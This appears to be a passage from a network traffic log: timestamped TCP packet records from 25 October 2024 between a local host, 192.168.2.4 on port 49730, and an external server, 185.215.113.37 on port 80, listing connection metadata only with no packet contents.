Oct 25, 2024 05:21:14.349131107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349157095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.349189997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.349261045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349272966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349283934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349297047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349303961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.349311113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349318981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349322081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.349353075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.349369049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349380970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349391937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349404097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349412918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.349416971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.349443913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.349476099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.474564075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.480171919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.755960941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756016970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756052017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756074905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756074905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756108999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756113052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756144047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756156921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756190062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756195068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756256104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756278992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756326914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756336927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756371975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756382942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756413937 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756421089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756465912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756473064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756506920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756514072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756541014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756558895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756589890 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756604910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756637096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756650925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756671906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756681919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756719112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756717920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756752968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756764889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756798983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756817102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756859064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756880045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756923914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.756943941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756978035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.756989956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757021904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757041931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757086039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757102966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757136106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757148027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757180929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757198095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757230997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757241964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757265091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757278919 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757297039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757309914 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757330894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757342100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757365942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757374048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757399082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757407904 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757436991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757442951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757468939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757481098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757503033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757513046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757535934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757546902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757569075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757581949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757602930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757612944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757637024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757651091 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757671118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757682085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757703066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757715940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757738113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757750034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757776022 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757793903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757807970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757839918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757839918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757859945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757875919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757894039 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757908106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757936001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757941008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757958889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.757975101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.757998943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758007050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758037090 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758039951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758057117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758074045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758094072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758105040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758120060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758137941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758157015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758169889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758179903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758203030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758228064 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758235931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758253098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758269072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758295059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758301020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758313894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758333921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758339882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758367062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758384943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758400917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758424997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758433104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758450031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758466005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758486986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758497000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758512020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758532047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758564949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758575916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758575916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758596897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758608103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758630037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758652925 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758663893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758677006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758697033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758718967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758729935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758749008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758763075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758778095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758795977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758816957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758827925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758840084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758861065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758883953 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758893967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758907080 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758927107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758945942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758960009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.758975029 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.758992910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759016037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759027958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759037018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759058952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759077072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759093046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759105921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759121895 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759140015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759154081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759169102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759187937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759210110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759222031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759233952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759254932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759272099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759289026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759308100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759342909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759352922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759375095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759392977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759408951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759443045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759452105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759452105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759475946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759491920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759510994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759538889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759545088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759562016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759577990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759591103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759609938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759613991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759639978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759659052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759673119 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759687901 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759708881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.759726048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.759767056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871421099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871504068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871540070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871603966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871627092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871627092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871627092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871665001 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871666908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871701956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871735096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871767998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871830940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871841908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871841908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871841908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871841908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871864080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871879101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871896982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871907949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871928930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871948957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871963978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.871970892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.871994972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872005939 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872030020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872033119 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872075081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872091055 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872123003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872136116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872157097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872167110 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872195959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872196913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872231007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872235060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872277021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872277021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872373104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872391939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872436047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872453928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872487068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872498989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872529030 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872549057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872597933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872610092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872652054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872678995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872720003 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872741938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872776031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872786045 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872837067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872870922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872883081 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872898102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872931957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.872944117 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872975111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.872992992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873028994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873039007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873070955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873089075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873122931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873128891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873164892 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873172045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873208046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873219967 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873250961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873275995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873323917 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873337984 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873370886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873382092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873411894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873435974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873481989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873498917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873532057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873542070 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873565912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873573065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873610020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873631001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873660088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873672009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873692989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873697996 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873725891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873733044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873759985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873769999 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873800993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873821974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873855114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873867989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873893023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873917103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.873965979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.873980999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 25, 2024 05:21:14.874030113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 25, 2024 05:21:14.874042988 CEST	80	49730	185.215.113.37	192.168.2.4
